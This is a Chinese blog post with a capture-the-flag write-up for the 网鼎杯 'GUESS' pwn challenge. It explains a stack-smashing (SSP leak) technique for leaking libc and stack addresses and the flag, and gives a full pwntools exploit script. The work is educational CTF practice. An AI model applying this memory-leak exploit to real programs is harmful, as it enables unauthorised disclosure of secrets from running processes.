PWN 网鼎杯 GUESS

最新推荐文章于 2023-11-12 21:12:14 发布
最新推荐文章于 2023-11-12 21:12:14 发布
阅读量1.6k 收藏
点赞数
分类专栏: 训练 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38783875/article/details/82594526
版权
pwn 同时被 2 个专栏收录
20 篇文章 3 订阅
订阅专栏
训练
13 篇文章 0 订阅
订阅专栏

拖了好久才看题,中间去参加比赛去了,休息够了开始学习啦!

GUESS 在checksec查看后,发现开了canary 和 NX保护,所以可以用 stack smash 来做这个题

ida打开,查看一下源代码:

发现程序自己把读取flag到了栈中,所以思路就是:

1.通过覆盖argv[0]先泄露puts的地址

2.通过泄漏的puts的地址,计算出基地址然后泄漏出environ的地址(也就是栈的地址),为什么泄漏environ:https://www.jianshu.com/p/cc9d09a3f65f 有详细的解释

3.找到flag和environ的偏移(就是找到flag在栈上的位置)

确定argv[0]的地址:

方法一:在main函数处下断,运行停止后指向程序名的就是argv[0]的地址

方法二:print & __libc_argv[0],可直接获得argv[0]的地址

可得argv[0]的地址为0x7fffffffe198

确定要可控字符串与argv[0]之间的距离:

程序通过gets函数获得我们输入的字符串,所以在get函数处下断,运行至断点处,发现gets将获得的字符串储存在距离rbp 0x40 的地方,print $rbp,然后用rbp的地址减掉0x40 (0x7fffffffe0b0-0x40=0x7FFFFFFFE070 )就是可控字符串的位置。

0x7fffffffe198-0x7FFFFFFFE070=0x128(296)

确定flag在栈上的位置:

 

flag和栈地址之间的距离  0x7fffffffe1a8-0x7fffffffe040=0x168(360)

脚本如下:

from pwn import *
from LibcSearcher import LibcSearcher

elf = ELF("./GUESS")
sh = process('./GUESS')

print ('[+]  leak puts address')
puts_got = elf.got["puts"]
print "puts_got:"+hex(puts_got)
payload = 'a'* 296 + p64(puts_got)
sh.recvuntil('Please type your guessing flag')
sh.sendline(payload)
sh.recvuntil('*** stack smashing detected ***: ')
sh.recv()
puts_addr = u64(sh.recvuntil(' ')[:-1]+'\x00\x00')
print "puts_addr:"+hex(puts_addr)

print('[+]  find environ address')
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr-libc.dump('puts')
environ_addr = libc_base + libc.dump('_environ')
print "environ_address:"+hex(environ_addr)


print ('[+] leak stack address')
sh.recvuntil('Please type your guessing flag')
payload = 'a'*296 + p64(environ_addr) 
sh.sendline(payload)
#sh.recvuntil('*** stack smashing detected ***:')
sh.recv()
stack_addr = u64(sh.recvuntil(' ')[:-1]+'\x00\x00') 
print "stack_addr:"+hex(stack_addr)

print('[+] leak flag')
sh.recvuntil('Please type your guessing flag')
payload = 'a'*296 + p64(stack_addr-0x168)
sh.sendline(payload)
sh.interactive()

 

SsMing.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网鼎杯pwnGUESS
Peanuts
08-30 1939
做了网鼎杯才发现自己有多菜。。。 拿到题目先ida一波 基本分析 看到了发现了是一个本地加载flag.txt所以有可能可以用stack samsh:详细可以看ctf wiki上的花式栈溢出技巧然后拖入gdb 进行一波checksec             可以发现有了nx栈不可执行这个还好,但是看到了cannary就有点头疼了。。还好有stack smash这个方法可以...
pwn-GUESS
aitangdao4981的博客
09-03 197
参考了其他wp之后才慢慢做出来的 记录一下 首先checksec一下 有canary 放到IDA看下源码 运行流程大概是 有三个fork 即三次输入机会,于是无法爆破cannary 本题用的是SSP leak,当canary被覆盖是就会触发__stack_chk_fail函数,其中会打印字符串argv[0],覆盖它就能实现任意地址读 源码中有open("./flag...
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3769
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
pwn】[UUCTF 2022 新生赛]easystack --pie爆破
question55的博客
11-12 327
查看程序保护发现开了pie:partial write(部分写入)就是一种利用PIE技术缺陷的bypass技术。由于内存的页载入机制,PIE的随机化只能影响到单个内存页。通常来说,一个内存页大小为0x1000,这就意味着不管地址怎么变,某条指令的后12位,3个十六进制数的地址是始终不变的。因此通过覆盖EIP的后8或16位 (按字节写入,每字节8位)就可以快速爆破或者直接劫持EIP简单来说就是后12位是不会被随机化的,接着看代码逻辑发现有个后门的函数可以getshell,但是问题是怎么溢出到这里,vuln函数
wdb2018_guess与stack smash
Tw0的博客
02-14 178
巩固一下stack smash技术,了解elf程序的运行环境参数。
2020网鼎杯.zip
07-20
网鼎杯】是一项旨在提升网络安全能力的比赛,它涵盖了多种网络安全技术,如逆向工程(Reverse Engineering)、pwn(破解)以及密码学等。 【逆向工程】是一种技术,它涉及分析软件或硬件的功能,以了解其工作原理...
网鼎杯2022白虎组题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎组,ctf
网鼎杯2020半决赛awdplus题目
12-07
"网鼎杯2020半决赛awdplus题目"是一个针对网络安全竞赛的专题,主要涉及的是Pwn(破解)和Web(网页安全)两类挑战。这类比赛通常旨在测试参赛者的逆向工程、代码审计、漏洞利用以及网络攻防技能。下面我们将详细...
网鼎杯 白虎组.zip
05-15
2020年第二届 网鼎杯网络安全大赛白虎组 线下赛 真题 pwn reserve web misc 按照“网鼎杯”大赛两年一届的举办原则,第二届“网鼎杯”大赛5月开赛,6月19日至21日在广东省深圳市举办线下半决赛、总决赛和颁奖典礼。
2020网鼎杯朱雀组题目.rar
05-20
含有misc,re,crypto,pwn,web。web题为thinkjava
[BUUCTF]wdb2018_guess——Stack smash技巧
zyxx_wjc的博客
07-20 420
stack smash
【八芒星计划】pwn python PIE爆破脚本绕过ASLR 覆盖后几位
carol2358的博客
09-02 3507
from pwn import * from LibcSearcher import * import time local_file = './magic_number' local_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so' remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so' select = 0 if select == 0: r = pro
针对简单Pwn溢出题的爆破
Rog's Blog
04-19 991
爆破大法好 例子:BUUCTF rip 首先得到源程序pwn1 file pwn1 checksec pwn1 啥也没有,很好 然后拖到IDA64分析一波 发现漏洞函数,地址为 0x401186 ,很好 祭出脚本,开始爆破 from pwn import * def brute(i): payload=b'a'*i+p64(0x401186) p=remote('node3.buuoj.cn',28460) p.sendline(payload) p.interact
初学pwn-攻防世界(guess_num)
天柱的博客
08-28 1118
初学pwn-writeUp 攻防世界的第六题,guess_num。 从这个题目可以猜出来,是跟猜数字有关的题目。启动靶机。 使用nc链接远端,查看一下。 发现链接之后,首先是输出了欢迎界面,之后需要输入一个名字。输入完成之后就要求开始猜数字。但是要命的是,只能猜一次,猜错了就GG。没有办法,这条路行不通。 下载文件,cat一下,很明显,是一个ELF文件。放进ida里查看一下。 发现这里的逻辑,就是生成一个伪随机数,然后进行猜数字。可以看到在23行这里,给srand函数设置了一个种子,然后进入循环,生成随
攻防世界 适合做桌面_攻防世界 - pwn - guess_num
weixin_29097457的博客
12-31 90
攻防世界 - pwn - guess_num攻防世界 - pwn - guess_numA、程序分析1、分析程序发现连续输入密码正确10次即可获取flag2、gets(0,rbp-30h)srand(rbp-10h)通过输入用户名可以覆盖srand的种子,srand rand为伪随机,种子一样时随机数相同3、进行随机数比较时 额外进行了加密B、分析利用1、分析加密算法2、通过用户名覆盖rbp-10...
网鼎杯2018 guess(stack smashing)
seaaseesa的博客
04-30 926
wdb2018_guess stack smashing 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Flag读取并存储在栈里 Fork三次子进程,然后有gets函数,导致栈溢出,但是有canary保护。 由于使用了gets,因此可以无限制溢出,并且有三次机会。那么,我们可以利用stack smashing报错,来输出信息。第一次,我们泄露函数的got表内容,为...
PWN学习之[Rookiss]-[echo1]
Magic1an的博客
08-19 1550
echo1是一个64位的elf可执行文件,用checksec检查发现基本没有进行保护措施Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: H
湖湘杯pwn400的wp
一个码农的笔记
12-09 2024
湖湘杯的pwn比赛很有趣,我做了pwn300的题目,感觉不错,我把wp分享出来,pwns的下载链接是: http://download.csdn.net/download/niexinming/10152069 把pwn400直接拖入ida中: main函数: Create Profile函数: Print Profile函数: Update Profile函数: Ex
PWN:栈溢出----偏移的计算
m0_53932372的博客
08-03 2027
就目前遇到的栈溢出题目而言,使用ida就可以完成便宜的计算。 这些栈溢出题目,基本上不需要调试,ida本身提供的栈空间数据就可以实现偏移的计算。 BUUCTF:bjdctf_2020_babystack2 这道题目,我们看ida: 具体做法不细说,主要看偏移: buf和nbyte 看栈空间: 下方没有s只有r,而r就是返回地址 给了后门函数,那就利用read函数,达到缓冲区溢出的目的。 +0x8-(-0x10)=0x18=24 偏移就是二十四。 以上只是本人拙见,栈溢出偏移困扰了我很久,希望这次不会
2023 羊城杯 pwn
最新发布
01-02
2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值